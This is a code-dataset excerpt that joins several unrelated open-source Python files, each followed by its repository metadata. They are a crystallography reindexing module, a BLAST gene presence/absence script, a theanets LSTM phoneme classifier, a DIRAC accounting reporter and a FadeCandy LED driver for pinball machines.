reidx_ops.sort(key=lambda x: not x.is_identity_op()) # identity op to first
self._reidx_ops = reidx_ops
if self.nproc > 1:
            # consumes a lot of memory (without much benefit)
reindexed_arrays = [arrays]
for op in reidx_ops[1:]:
reindexed_arrays.append(map(lambda x: x.customized_copy(indices=op.apply(x.indices())).map_to_asu(), arrays))
else:
reindexed_arrays = None
old_ops = map(lambda x:0, xrange(len(arrays)))
new_ops = map(lambda x:0, xrange(len(arrays)))
global kabsch_selective_breeding_worker_dict
kabsch_selective_breeding_worker_dict = dict(nproc=self.nproc, arrays=arrays,
reindexed_arrays=reindexed_arrays,
reidx_ops=reidx_ops) # constants during cycles
pool = multiprocessing.Pool(self.nproc)
for ncycle in xrange(max_cycle):
#new_ops = copy.copy(old_ops) # doesn't matter
self._final_cc_means = []
for i in xrange(len(arrays)):
cc_means = []
a = arrays[i]
#ttt=time.time()
for j, op in enumerate(reidx_ops):
cc_list = []
if self.nproc > 1:
tmp = reindexed_arrays[j][i]
else:
if op.is_identity_op(): tmp = a
else: tmp = a.customized_copy(indices=op.apply(a.indices())).map_to_asu()
"""
def work_local(ref): # XXX This function is very slow when nproc>1...
if ref==i: return None
if self.nproc > 1:
tmp2 = reindexed_arrays[new_ops[ref]][ref]
else:
if reidx_ops[new_ops[ref]].is_identity_op(): tmp2 = arrays[ref]
else: tmp2 = arrays[ref].customized_copy(indices=reidx_ops[new_ops[ref]].apply(arrays[ref].indices())).map_to_asu()
cc = calc_cc(tmp, tmp2)
if cc==cc: return cc
return None
# work_local()
cc_list = easy_mp.pool_map(fixed_func=work_local,
args=range(len(arrays)),
processes=self.nproc)
"""
cc_list = pool.map(kabsch_selective_breeding_worker,
((k, i, tmp, new_ops) for k in range(len(arrays))))
cc_list = filter(lambda x: x is not None, cc_list)
if len(cc_list) > 0:
cc_means.append((j, sum(cc_list)/len(cc_list)))
#print >>self.log_out, "DEBUG:", i, j, cc_list, cc_means[-1]
if cc_means:
max_el = max(cc_means, key=lambda x:x[1])
print >>self.log_out, "%3d %s" % (i, " ".join(map(lambda x: "%s%d:% .4f" % ("*" if x[0]==max_el[0] else " ", x[0], x[1]), cc_means)))
self._final_cc_means.append(cc_means)
#print "%.3f sec" % (time.time()-ttt)
new_ops[i] = max_el[0]
else:
print >>self.log_out, "%3d %s Error! cannot calculate CC" % (i, " ".join(map(lambda x: " %d: nan" % x, xrange(len(reidx_ops)))))
# XXX append something to self._final_cc_means?
print >>self.log_out, "In %4d cycle" % (ncycle+1)
print >>self.log_out, " old",old_ops
print >>self.log_out, " new",new_ops
print >>self.log_out, " number of different assignments:", len(filter(lambda x:x[0]!=x[1], zip(old_ops,new_ops)))
print >>self.log_out, ""
if old_ops==new_ops:
self.best_operators = map(lambda x: reidx_ops[x], new_ops)
print >>self.log_out, "Selective breeding is finished in %d cycles" % (ncycle+1)
return
old_ops = copy.copy(new_ops)
print >>self.log_out, "WARNING:: Selective breeding is not finished. max cycles reached."
self.best_operators = map(lambda x: reidx_ops[x], new_ops) # better than nothing..
# assign_operators()
# class KabschSelectiveBreeding
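# A minimal usage sketch (hypothetical HKL file names; assumes a working
# cctbx/yamtbx installation). Not part of the original module:
#
#   ksb = KabschSelectiveBreeding(["run1_XDS_ASCII.HKL", "run2_XDS_ASCII.HKL"],
#                                 nproc=2, log_out=sys.stdout)
#   ksb.assign_operators()
#   ksb.show_assign_summary()
#   new_files = ksb.modify_xds_ascii_files()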
class ReferenceBased(ReindexResolver):
def __init__(self, xac_files, ref_array, d_min=3, min_ios=3, nproc=1, max_delta=5, log_out=null_out()):
ReindexResolver.__init__(self, xac_files, d_min, min_ios, nproc, max_delta, log_out)
self.read_xac_files()
self.ref_array = ref_array.resolution_filter(d_min=d_min).as_non_anomalous_array().merge_equivalents(use_internal_variance=False).array()
# __init__()
def assign_operators(self, reidx_ops=None):
arrays = self.arrays
self.best_operators = None
if reidx_ops is None: reidx_ops = self.find_reindex_ops()
print >>self.log_out, "Reindex operators:", map(lambda x: str(x.as_hkl()), reidx_ops)
print >>self.log_out, ""
reidx_ops.sort(key=lambda x: not x.is_identity_op()) # identity op to first
new_ops = map(lambda x:0, xrange(len(arrays)))
for i, a in enumerate(arrays):
cc_list = []
a = arrays[i]
for j, op in enumerate(reidx_ops):
if op.is_identity_op(): tmp = a
else: tmp = a.customized_copy(indices=op.apply(a.indices())).map_to_asu()
cc = calc_cc(tmp, self.ref_array)
if cc==cc: cc_list.append((j,cc))
max_el = max(cc_list, key=lambda x:x[1])
print >>self.log_out, "%3d %s" % (i, " ".join(map(lambda x: "%s%d:% .4f" % ("*" if x[0]==max_el[0] else " ", x[0], x[1]), cc_list)))
new_ops[i] = max_el[0]
print >>self.log_out, " operator:", new_ops
print >>self.log_out, " number of different assignments:", len(filter(lambda x:x!=0, new_ops))
print >>self.log_out, ""
self.best_operators = map(lambda x: reidx_ops[x], new_ops)
# assign_operators()
# class ReferenceBased
class BrehmDiederichs(ReindexResolver):
def __init__(self, xac_files, d_min=3, min_ios=3, nproc=1, max_delta=5, log_out=null_out()):
ReindexResolver.__init__(self, xac_files, d_min, min_ios, nproc, max_delta, log_out)
self.read_xac_files()
# __init__()
def assign_operators(self, reidx_ops=None):
arrays = self.arrays
self.best_operators = None
if reidx_ops is None: reidx_ops = self.find_reindex_ops()
print >>self.log_out, "Reindex operators:", map(lambda x: str(x.as_hkl()), reidx_ops)
print >>self.log_out, ""
reidx_ops.sort(key=lambda x: not x.is_identity_op()) # identity op to first
data = None
latt_id = flex.int([])
for i, a in enumerate(arrays):
if data is None: data = a
else: data = data.concatenate(a, assert_is_similar_symmetry=False)
latt_id.extend(flex.int(a.size(), i))
latt_id = data.customized_copy(data=latt_id.as_double())
result = brehm_diederichs.run(L=[data, latt_id], nproc=self.nproc, verbose=True)
self.best_operators = map(lambda x: None, xrange(len(arrays)))
for op in result:
idxes = map(int, result[op])
print >>self.log_out, " %s num=%3d idxes= %s" %(op, len(result[op]), idxes)
for idx in idxes:
self.best_operators[idx] = sgtbx.change_of_basis_op(op)
# assign_operators()
# class BrehmDiederichs
if __name__ == "__main__":
import sys
lst = sys.argv[1]
xac_files = map(lambda x:x.strip(), open(lst))
ksb = KabschSelectiveBreeding(xac_files, log_out=sys.stdout)
if 1: # debug code
from cctbx import sgtbx
import random
debug_op = sgtbx.change_of_basis_op("k,h,l")
idxes = range(len(ksb.arrays))
random.shuffle(idxes)
for i in idxes[:len(ksb.arrays)//2]:
ksb.arrays[i] = ksb.arrays[i].customized_copy(indices=debug_op.apply(ksb.arrays[i].indices()))
print "altered:", idxes
ksb.assign_operators([debug_op, sgtbx.change_of_basis_op("h,k,l")])
print "right?:", [i for i, x in enumerate(ksb.best_operators) if not x.is_identity_op()]
#ksb.debug_write_mtz()
#ksb.modify_xds_ascii_files()
quit()
arrays = []
for f in xac_files:
print "Reading", f
xac = XDS_ASCII(f, i_only=True)
xac.remove_rejected()
a = xac.i_obs().resolution_filter(d_min=3)
a = a.merge_equivalents(use_internal_variance=False).array()
arrays.append(a)
symm = arrays[0].crystal_symmetry()
cosets = reindex.reindexing_operators(symm, symm)
reidx_ops = cosets.combined_cb_ops()
reidx_ops.sort(key=lambda x: not x.is_identity_op())
print " Possible reindex operators:", map(lambda x: str(x.as_hkl()), reidx_ops)
determined = set([0,])
old_ops = map(lambda x:0, xrange(len(arrays)))
for ncycle in xrange(100): # max cycle
new_ops = map(lambda x:0, xrange(len(arrays)))
for i in xrange(len(arrays)):
cc_list = []
a = arrays[i]
for j, op in enumerate(reidx_ops):
tmp = a.customized_copy(indices=op.apply(a.indices())).map_to_asu()
for ref in determined:
if ref==i: continue
tmp2 = arrays[ref].customized_copy(indices=reidx_ops[new_ops[ref]].apply(arrays[ref].indices())).map_to_asu()
cc = calc_cc(tmp, tmp2)
#print "%d reindex= %10s cc=.%4f" % (i, op.as_hkl(), cc)
if cc==cc:
#cc_list.setdefault(op, []).append(cc)
cc_list.append((j,cc))
if len(cc_list) == 0: continue
max_el = max(cc_list, key=lambda x:x[1])
print i, max_el, sum(map(lambda x:x[1], cc_list))/len(cc_list)
new_ops[i] = max_el[0]
#arrays[i] = a.customized_copy(indices=reidx_ops[max_el[0]].apply(a.indices())).map_to_asu()
determined.add(i)
print "In %4d cycle" % ncycle
print "old",old_ops
print "new",new_ops
print "eq?", old_ops==new_ops
print
if old_ops==new_ops: break
old_ops = new_ops
# Junk
merge_org = arrays[0].deep_copy()
for a in arrays[1:]: merge_org = merge_org.concatenate(a, assert_is_similar_symmetry=False)
merge_org = merge_org.merge_equivalents(use_internal_variance=False).array()
merge_org.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="noreindex.mtz")
merge_new = None
for a, opi in zip(arrays, new_ops):
a = a.customized_copy(indices=reidx_ops[opi].apply(a.indices()))
if merge_new is None: merge_new = a
else: merge_new = merge_new.concatenate(a, assert_is_similar_symmetry=False)
merge_new = merge_new.merge_equivalents(use_internal_variance=False).array()
merge_new.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="reindexed.mtz")
|
keitaroyam/yamtbx
|
yamtbx/dataproc/auto/multi_merging/resolve_reindex.py
|
Python
|
bsd-3-clause
| 20,485
|
[
"CRYSTAL"
] |
006da0fa0b5ad0a13b00290570f3114898acb96025dc6cd9598e38a4bbc1e045
|
#!/usr/bin/env python
import os
import sys
from Bio import SeqIO, Entrez
from Bio.Blast import NCBIXML
import threading
import argparse
import subprocess
import time
programUsage = """
NAME
preAb.py - Presence/absence of genes with BLAST.
SYNOPSIS
preAb.py -i genes*.fasta -d db*.fasta -o output -c query_cov -p query_identity
-e E-value
DESCRIPTION
    Runs BLAST with the query genes against the given database sequences to
    identify whether each gene is present or absent.
By default the format for the input sequences is FASTA.
#Simplest way to run it is to provide the input sequences in fasta format (default).
    preAb.py -i genes*.fasta -d db*.fasta -o output
OPTIONS
-h
Help. Print this help information and exit.
-i filenames
Specify the input fasta sequence files for the program. You can use wildcard (*)
        to specify multiple files.
-o filename
        Specify the prefix for the output files. By default the output files will
        have the prefix "Output" if not specified by the user (default=Output).
-c value
Specify the minimum query coverage (%) to be used (default=90).
-p value
Specify the minimum identity (%) for all matched regions (default=90)
-e value
        Specify the maximum BLAST E-value for a match to be counted (default=0.001).
-l value
Specify the minimum length of a match to be used (default=100).
AUTHOR
cc19. June 2015
DEPENDENCIES
biopython,NCBI BLAST
"""
def readUserArguments(UserArgs):
Options = argparse.ArgumentParser(UserArgs[0],
description="preAb.py - Presence/absence of genes with BLAST",
prefix_chars="-",
add_help=False,
epilog="Chrispin Chaguza (Chrispin.Chaguza@liv.ac.uk)")
Options.add_argument("-i",
action="store",
nargs="*",
required=False,
metavar="Input",
dest="Input",
help="Input genomes (fasta format)")
Options.add_argument("-d",
action="store",
nargs="*",
required=False,
metavar="Dbase",
dest="Dbase",
help="Input genomes (fasta format)")
Options.add_argument("-o",
action="store",
nargs=1,
required=False,
metavar="Output",
dest="Output",
help="Output prefix (default=Output)",
default="Output")
Options.add_argument("-c",
action="store",
nargs=1,
required=False,
metavar="Sequence_Coverage",
dest="Sequence_Coverage",
help="Percent query coverage (default=90)",
default="90")
Options.add_argument("-p",
action="store",
nargs=1,
required=False,
metavar="Sequence_Identity",
dest="Sequence_Identity",
help="Percent Identity for BLAST HSPs (default=90)",
default="90")
Options.add_argument("-e",
action="store",
nargs=1,
required=False,
metavar="EValue",
dest="EValue",
help="BLAST E-value (default=0.001)",
default="0.001")
Options.add_argument("-l",
action="store",
nargs=1,
required=False,
metavar="Length",
dest="Length",
help="Minimum HSP match length (default=100)",
default="100")
Options.add_argument("-r",
action="store_true",
dest="Keep",
help="Remove BLAST output files (keep by default)")
Options.add_argument("-h",
action="store_true",
dest="Help",
help="Show detailed help")
Options = Options.parse_args()
return Options
def checkUserArguments(UserOptions):
Options = UserOptions
OptionsVars = {}
if Options.Help:
sys.stdout.write(str(programUsage) + "\n")
sys.exit()
if Options.Input:
OptionsVars["i"] = Options.Input[0:]
else:
showErrorMessage("input files (-i) are required")
sys.exit()
if Options.Dbase:
OptionsVars["d"] = Options.Dbase[0:]
else:
showErrorMessage("input files (-d) are required")
sys.exit()
if Options.Output != "Output":
OptionsVars["o"] = Options.Output[0:][0]
else:
OptionsVars["o"] = Options.Output[0:]
if Options.Sequence_Coverage != "90":
if ((int(Options.Sequence_Coverage[0:][0]) > 0) and (int(Options.Sequence_Coverage[0:][0]) < 100)):
OptionsVars["c"] = Options.Sequence_Coverage[0:][0]
else:
showErrorMessage("Sequence coverage (-c) should be >0 and <=100 (default=90)")
else:
OptionsVars["c"] = Options.Sequence_Coverage[0:]
if Options.Sequence_Identity != "90":
if ((float(Options.Sequence_Identity[0:][0]) > 0) and (float(Options.Sequence_Identity[0:][0]) <= 100)):
OptionsVars["p"] = Options.Sequence_Identity[0:][0]
else:
showErrorMessage("Sequence identity (-p) should be >0 and <=100 (default=90)")
else:
OptionsVars["p"] = Options.Sequence_Identity[0:]
if Options.EValue != "0.001":
if float(Options.EValue[0:][0]) >= 0:
OptionsVars["e"] = Options.EValue[0:][0]
else:
showErrorMessage("BLAST E-value (-e) should be >0 (default=0.001)")
else:
OptionsVars["e"] = Options.EValue[0:]
if Options.Length != "100":
if float(Options.Length[0:][0]) >= 0:
OptionsVars["l"] = Options.Length[0:][0]
else:
showErrorMessage("Minimum HSP match length (-l) should be >0 (default=100)")
else:
OptionsVars["l"] = Options.Length[0:]
OptionsVars["r"] = Options.Keep
return OptionsVars
def showErrorMessage(ErrorMessage):
sys.stdout.write("\nError: " + str(ErrorMessage) + "\n")
sys.stdout.write("\nUse -h option to see more detailed help\n")
sys.exit()
def showProgramStatus(ItemList, ItemPos):
NumElements = ItemList
ProgressChars = "="
HashChars = ProgressChars * int(round(float(ItemPos + 1) / float(NumElements) * 100))
SpaceChars = " " * int(round(100 - len(HashChars)))
PercentChars = float(ItemPos + 1) / NumElements * 100
if (ItemPos + 1) >= ItemList or PercentChars >= 100 or \
(int(float(ItemPos + 1) / float(NumElements) * 100) >= 100):
sys.stdout.write("\r|{0}| {1:.2f}% {2}".format(ProgressChars * 100, 100, ""))
sys.stdout.flush()
sys.stdout.write("\r|{0}| {1:.2f}% ".format(ProgressChars * 100, 100))
else:
sys.stdout.write("\r|{0}| {1:.2f}% {2}".format(HashChars + SpaceChars, PercentChars, ""))
sys.stdout.flush()
sys.stdout.write("\r|{0}| {1:.2f}% {2}".format(HashChars + SpaceChars, PercentChars, ""))
def RunBLASTThread(blastCommand, blastOutput):
try:
FNULL = open(blastOutput, "wb")
subprocess.check_call(blastCommand, stdout=FNULL, stderr=FNULL)
FNULL.close()
except (StandardError, KeyboardInterrupt, SystemExit), ErrorText:
sys.stdout.write("\n" + ErrorText.message + "\n\n")
sys.exit()
def main():
Args = readUserArguments(sys.argv[:])
inputOptions = checkUserArguments(Args)
print "\n---------------------------------------------------------------------------------------------------------------"
print "- preAb v1.0.0 -"
print "---------------------------------------------------------------------------------------------------------------"
print "- Program for identifying presence/absence of genes sequences using BLAST -"
print "- Institute of Infection and Global Health, University of Liverpool, UK -"
print "- All rights reserved -"
print "---------------------------------------------------------------------------------------------------------------"
if not os.path.exists(inputOptions["o"] + ".Tmp.Files/"):
os.makedirs(inputOptions["o"] + ".Tmp.Files/")
else:
pass
print "\ncreating sequence database for the input fasta sequences"
for geneSeqPos, geneSeq in enumerate(inputOptions["d"]):
makeDBaseCommand = []
makeDBaseCommand.append("makeblastdb")
makeDBaseCommand.append("-in")
makeDBaseCommand.append(geneSeq)
makeDBaseCommand.append("-dbtype")
makeDBaseCommand.append("nucl")
FNULL = open(os.devnull, "wb")
subprocess.call(makeDBaseCommand, stdout=FNULL, stderr=FNULL)
FNULL.close()
showProgramStatus(len(inputOptions["d"]), geneSeqPos)
print "\n\nrunning BLAST on the query sequences against database"
blastOutputFiles = []
inputGeneNames = []
inputDBNames = []
currentThreads = threading.activeCount()
for isolateSeqPos, isolateSeq in enumerate(inputOptions["d"]):
inSeqFName = os.path.basename(isolateSeq).split(".")[0]
inputDBNames.append(inSeqFName)
for geneSeqPos, geneSeq in enumerate(inputOptions["i"]):
geneFName = os.path.basename(geneSeq).split(".")[0]
blastCommand = []
blastCommand.append("blastn")
blastCommand.append("-query")
blastCommand.append(geneSeq)
blastCommand.append("-db")
blastCommand.append(isolateSeq)
blastCommand.append("-outfmt")
blastCommand.append("5")
blastCommand.append("-out")
blastCommand.append(inputOptions["o"] + ".Tmp.Files/" + inSeqFName + "." + geneFName + ".blast.xml")
blastOutputFiles.append(inputOptions["o"] + ".Tmp.Files/" + inSeqFName + "." + geneFName + ".blast.xml")
inputGeneNames.append(geneFName)
while True:
if threading.activeCount() < 15:
try:
blastThread = threading.Thread(name=inSeqFName + "." + geneFName,
target=RunBLASTThread, args=(blastCommand, os.devnull))
blastThread.setDaemon(True)
blastThread.start()
except (StandardError, KeyboardInterrupt, SystemExit):
print "Unknown error occurred OR the user killed the program"
sys.exit()
showProgramStatus(len(inputOptions["i"])*len(inputOptions["d"]), isolateSeqPos*len(inputOptions["i"])+geneSeqPos)
break
showProgramStatus(len(inputOptions["i"])*len(inputOptions["d"]), (isolateSeqPos+1)*len(inputOptions["i"]))
while threading.activeCount() > currentThreads:
time.sleep(2)
print "\n\ncalculating length of each query sequence"
blastOutputTXT = open(inputOptions["o"]+".Summary.txt","w")
geneSeqLengths = {}
for geneSequencePos,geneSequence in enumerate(inputOptions["i"]):
geneSequenceRecord=SeqIO.read(open(geneSequence,"rU"),"fasta")
geneSeqLengths[os.path.basename(geneSequence).split(".")[0]]=len(geneSequenceRecord.seq)
showProgramStatus(len(inputOptions["i"]), geneSequencePos)
blastOutputTXT.write("taxa")
for querySeqPos, querySeq in enumerate(inputOptions["i"]):
blastOutputTXT.write("\t"+os.path.basename(querySeq).split(".")[0])
blastOutputTXT.write("\n")
print "\n\ndetermining query sequence coverage and percent identity"
for subjectSeqPos, subjectSeq in enumerate(inputDBNames):
blastOutputTXT.write(subjectSeq)
sbjctSeqName=os.path.basename(subjectSeq).split(".")[0]
for querySeqPos, querySeq in enumerate(inputOptions["i"]):
querySeqName=os.path.basename(querySeq).split(".")[0]
try:
blastOutput=open(inputOptions["o"] + ".Tmp.Files/"+sbjctSeqName+"."+querySeqName+".blast.xml","rU")
blastRecord=NCBIXML.read(blastOutput)
tempCoverage = []
tempIdentity = []
tempIdentityCount = 0
for blastRecordAlign in blastRecord.alignments:
for hsp in blastRecordAlign.hsps:
if (hsp.expect < float(inputOptions["e"])) and (len(hsp.query) >= int(inputOptions["l"])):
tempCoverage.append(len(hsp.query))
tempIdentity.append(hsp.match.count("|")/float(len(hsp.query)))
tempIdentityCount+=1
querySeqCoverage = (sum(tempCoverage)/float(geneSeqLengths[querySeqName]))*100
if tempIdentityCount == 0:
matchIdentity = 0
else:
matchIdentity = (sum(tempIdentity)/float(tempIdentityCount))*100
                querySeqCoverage = min(querySeqCoverage, 100.0)  # cap coverage at 100%
if (querySeqCoverage>=float(inputOptions["c"])) and (matchIdentity>=float(inputOptions["p"])):
blastOutputTXT.write("\t1")
else:
blastOutputTXT.write("\t0")
            except (StandardError, KeyboardInterrupt, SystemExit), err:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
print "Something wrong with BLAST files OR the user killed the program"
sys.exit()
showProgramStatus(len(inputDBNames)*len(inputOptions["i"]),subjectSeqPos*len(inputOptions["i"])+querySeqPos)
showProgramStatus(len(inputDBNames)*len(inputOptions["i"]),(subjectSeqPos+1)*len(inputOptions["i"]))
#sortedSerotypeCoverage = sorted(serotypeCoverage.iteritems(),key=operator.itemgetter(1),reverse=True)
blastOutputTXT.write("\n")
blastOutputTXT.close()
print "\n--------------------------------------------------------------------------------------------------------------"
print "- Finished -"
print "--------------------------------------------------------------------------------------------------------------\n"
if __name__ == "__main__":
main()
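# Example invocation (hypothetical file names):
#   python preAb.py -i genes/*.fasta -d genomes/*.fasta -o Results
# The resulting Results.Summary.txt is a tab-separated matrix with one row per
# database sequence, one column per query gene, and 1/0 for presence/absence.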
|
cc19/featurePresenceAbsence
|
preAb.py
|
Python
|
gpl-2.0
| 15,051
|
[
"BLAST",
"Biopython"
] |
2750226e4415c6d8e2b8e57fc21647e442c28357c2a305b11309e8664d58e1a1
|
#!/usr/bin/env python
'''Theanets example using a deep bidirectional LSTM for phoneme classification.
This example loads an audio classification benchmark from github, defines a
callable for extracting batches from the downloaded dataset, and trains a deep
classifier network on the data. The network that is evaluated as part of the
benchmarks is a three-layer bidirectional LSTM. Typically the model exceeds 90%
accuracy on the training set, but reaches only about 70% accuracy on the
validation set. Clearly overtraining is a critical issue here.
This example only works with Python 2 at the moment.
'''
import climate
import io
import numpy as np
import theanets
import scipy.io
import os
import tempfile
import urllib
import zipfile
logging = climate.get_logger('lstm-chime')
climate.enable_default_logging()
BATCH_SIZE = 32
TRAIN_NC = os.path.join(tempfile.gettempdir(), 'chime1_train.nc')
VALID_NC = os.path.join(tempfile.gettempdir(), 'chime1_valid.nc')
ZIPURL = 'https://github.com/craffel/lstm_benchmarks/archive/master.zip'
# If needed, get the data files from https://github.com/craffel/lstm_benchmarks.
if not os.path.isfile(TRAIN_NC) or not os.path.isfile(VALID_NC):
logging.info('attempting data copy from url: %s', ZIPURL)
z = zipfile.ZipFile(io.BytesIO(urllib.urlopen(ZIPURL).read()))
with open(TRAIN_NC, 'wb') as savefile:
savefile.write(z.read('lstm_benchmarks-master/data/train_1_speaker.nc'))
with open(VALID_NC, 'wb') as savefile:
savefile.write(z.read('lstm_benchmarks-master/data/val_1_speaker.nc'))
z.close()
def batch_at(features, labels, seq_begins, seq_lengths):
'''Extract a single batch of data to pass to the model being trained.
Parameters
----------
features, labels : ndarray
Arrays of the input features and target labels.
seq_begins : ndarray
Array of the start offsets of the speech segments to include.
seq_lengths : ndarray
Array of the lengths of the speech segments to include in the batch.
Returns
-------
features, labels, mask : ndarrays
A triple of arrays for training a network. The first element contains
input features, the second contains target labels, and the third
contains a "mask" consisting of ones where there is valid data and zeros
everywhere else.
'''
length = seq_lengths.max()
feat = np.zeros((length, BATCH_SIZE, features.shape[-1]), 'f')
labl = np.zeros((length, BATCH_SIZE), 'int32')
mask = np.zeros((length, BATCH_SIZE), 'f')
for b, (begin, length) in enumerate(zip(seq_begins, seq_lengths)):
feat[:length, b] = features[begin:begin+length]
labl[:length, b] = labels[begin:begin+length]
mask[:length, b] = 1
return [feat, labl, mask]
def batches(dataset):
'''Returns a callable that chooses sequences from netcdf data.'''
seq_lengths = dataset.variables['seqLengths'].data
seq_begins = np.concatenate(([0], np.cumsum(seq_lengths)[:-1]))
def sample():
chosen = np.random.choice(
list(range(len(seq_lengths))), BATCH_SIZE, replace=False)
return batch_at(dataset.variables['inputs'].data,
dataset.variables['targetClasses'].data,
seq_begins[chosen],
seq_lengths[chosen])
return sample
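# Sketch of what the sampler yields (not in the original): each call returns
# one batch,
#   feat, labl, mask = batches(scipy.io.netcdf_file(TRAIN_NC))()
# with shapes (max_seq_len, BATCH_SIZE, n_features), (max_seq_len, BATCH_SIZE)
# and (max_seq_len, BATCH_SIZE); mask is 1 where a sequence has valid frames.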
# Now that we can load data, we construct a recurrent classifier model and then
# train it up! Training progress will be displayed on the console. This example
# can take a good while to run, especially the first time it is run (it takes
# about 20min to compile the model from scratch, but only a few minutes if all
# of the compiler targets are cached).
def layer(n):
'''Helper for building a bidirectional LSTM layer with n cells.'''
return dict(form='bidirectional', worker='lstm', size=n)
e = theanets.Experiment(
theanets.recurrent.Classifier,
layers=(39, layer(156), layer(300), layer(102), (51, 'softmax')),
weighted=True,
)
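# Reading the layer tuple above: 39 input features per frame, three hidden
# bidirectional LSTM layers (156, 300 and 102 cells), and a 51-way softmax
# output, one unit per phoneme class in the benchmark data.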
e.train(
batches(scipy.io.netcdf_file(TRAIN_NC)),
batches(scipy.io.netcdf_file(VALID_NC)),
algorithm='rmsprop',
learning_rate=0.0001,
momentum=0.9,
max_gradient_clip=1,
input_noise=0.6,
train_batches=30,
valid_batches=3,
batch_size=BATCH_SIZE,
)
|
masterkeywikz/seq2graph
|
src/theanets-0.6.1/examples/lstm-chime.py
|
Python
|
mit
| 4,307
|
[
"NetCDF"
] |
8eb923581e8e6f81610cc43f99100271318fc76f080cb1cab9337d0e79ffda09
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This package implements various diffraction analyses.
"""
|
vorwerkc/pymatgen
|
pymatgen/analysis/diffraction/__init__.py
|
Python
|
mit
| 156
|
[
"pymatgen"
] |
65f7ea6dc1ced7a4a3530d417bbede54ccfb9de89b0d0ce48ab37b0fc6acab6e
|
""" Accounting reporter
"""
import hashlib
import re
from DIRAC import S_OK, S_ERROR, gConfig
from DIRAC.Core.Utilities.Plotting.ObjectLoader import loadObjects
from DIRAC.ConfigurationSystem.Client.PathFinder import getServiceSection
from DIRAC.AccountingSystem.private.Policies import gPoliciesList
from DIRAC.AccountingSystem.private.Plotters.BaseReporter import BaseReporter as myBaseReporter
class PlottersList(object):
def __init__(self):
objectsLoaded = loadObjects('AccountingSystem/private/Plotters',
re.compile(r".*[a-z1-9]Plotter\.py$"),
myBaseReporter)
self.__plotters = {}
for objName in objectsLoaded:
self.__plotters[objName[:-7]] = objectsLoaded[objName]
def getPlotterClass(self, typeName):
try:
return self.__plotters[typeName]
except KeyError:
return None
class MainReporter(object):
def __init__(self, db, setup):
self._db = db
self.setup = setup
self.csSection = getServiceSection("Accounting/ReportGenerator", setup=setup)
self.plotterList = PlottersList()
def __calculateReportHash(self, reportRequest):
requestToHash = dict(reportRequest)
granularity = gConfig.getValue("%s/CacheTimeGranularity" % self.csSection, 300)
for key in ('startTime', 'endTime'):
epoch = requestToHash[key]
requestToHash[key] = epoch - epoch % granularity
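      # e.g. with the default granularity of 300 s, epochs 1000 and 1150 both
      # round down to 900, so near-simultaneous requests share one cache hash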
md5Hash = hashlib.md5()
md5Hash.update(repr(requestToHash))
md5Hash.update(self.setup)
return md5Hash.hexdigest()
def generate(self, reportRequest, credDict):
typeName = reportRequest['typeName']
plotterClass = self.plotterList.getPlotterClass(typeName)
if not plotterClass:
return S_ERROR("There's no reporter registered for type %s" % typeName)
if typeName in gPoliciesList:
retVal = gPoliciesList[typeName].checkRequest(reportRequest['reportName'],
credDict,
reportRequest['condDict'],
reportRequest['grouping'])
if not retVal['OK']:
return retVal
reportRequest['hash'] = self.__calculateReportHash(reportRequest)
plotter = plotterClass(self._db, self.setup, reportRequest['extraArgs'])
return plotter.generate(reportRequest)
def list(self, typeName):
plotterClass = self.plotterList.getPlotterClass(typeName)
if not plotterClass:
return S_ERROR("There's no plotter registered for type %s" % typeName)
plotter = plotterClass(self._db, self.setup)
return S_OK(plotter.plotsList())
|
arrabito/DIRAC
|
AccountingSystem/private/MainReporter.py
|
Python
|
gpl-3.0
| 2,653
|
[
"DIRAC"
] |
acb6b7b7968a87f1bc26d49eb8afa4c9f3e7251c326e9373738683eac0072c48
|
"""Contains code for an FadeCandy hardware for RGB LEDs."""
# fadecandy.py
# Mission Pinball Framework
# Written by Brian Madden & Gabe Knuth
# Released under the MIT License. (See license info at the end of this file.)
# Documentation and more info at http://missionpinball.com/mpf
import logging
import json
import struct
from mpf.system.utility_functions import Util
from mpf.platform.openpixel import OpenPixelClient
from mpf.platform.openpixel import HardwarePlatform as OPHardwarePlatform
class HardwarePlatform(OPHardwarePlatform):
"""Base class for the open pixel hardware platform.
Args:
machine: The main ``MachineController`` object.
"""
def __init__(self, machine):
super(HardwarePlatform, self).__init__(machine)
self.log = logging.getLogger("FadeCandy")
self.log.debug("Configuring FadeCandy hardware interface.")
def __repr__(self):
return '<Platform.FadeCandy>'
def _setup_opc_client(self):
self.opc_client = FadeCandyOPClient(self.machine,
self.machine.config['open_pixel_control'])
class FadeCandyOPClient(OpenPixelClient):
"""Base class of an OPC client which connects to a FadeCandy server.
Args:
machine: The main ``MachineController`` instance.
config: Dictionary which contains configuration settings for the OPC
client.
This class implements some FadeCandy-specific features that are not
available with generic OPC implementations.
"""
def __init__(self, machine, config):
super(FadeCandyOPClient, self).__init__(machine, config)
self.log = logging.getLogger('FadeCandyClient')
self.update_every_tick = True
self.gamma = self.machine.config['led_settings']['gamma']
self.whitepoint = Util.string_to_list(
self.machine.config['led_settings']['whitepoint'])
self.whitepoint[0] = float(self.whitepoint[0])
self.whitepoint[1] = float(self.whitepoint[1])
self.whitepoint[2] = float(self.whitepoint[2])
self.linear_slope = (
self.machine.config['led_settings']['linear_slope'])
self.linear_cutoff = (
self.machine.config['led_settings']['linear_cutoff'])
self.keyframe_interpolation = (
self.machine.config['led_settings']['keyframe_interpolation'])
self.dithering = self.machine.config['led_settings']['dithering']
if not self.dithering:
self.disable_dithering()
if not self.keyframe_interpolation:
self.update_every_tick = False
self.set_global_color_correction()
self.write_firmware_options()
def __repr__(self):
return '<Platform.FadeCandyOPClient>'
def set_gamma(self, gamma):
"""Sets the gamma correction of the FadeCandy. Specifically this is the
exponent for the nonlinear portion of the brightness curve.
Args:
gamma: Float of the new gamma. Default is 2.5.
"""
self.gamma = float(gamma)
self.set_global_color_correction()
def set_whitepoint(self, whitepoint):
"""Sets the white point of the FadeCandy. This is a vector of [red,
green, blue] values to multiply by colors prior to gamma correction.
Args:
whitepoint: A three-item list of floating point values. Default is
[1.0, 1.0, 1.0]
"""
self.whitepoint = whitepoint
self.set_global_color_correction()
def set_linear_slope(self, linearslope):
"""Sets the linear slope (output / input) of the linear section of the
brightness curve.
Args:
linearslope: Float of the new linear slope. Default is 1.0.
"""
        self.linear_slope = float(linearslope)  # must match the attribute read by set_global_color_correction()
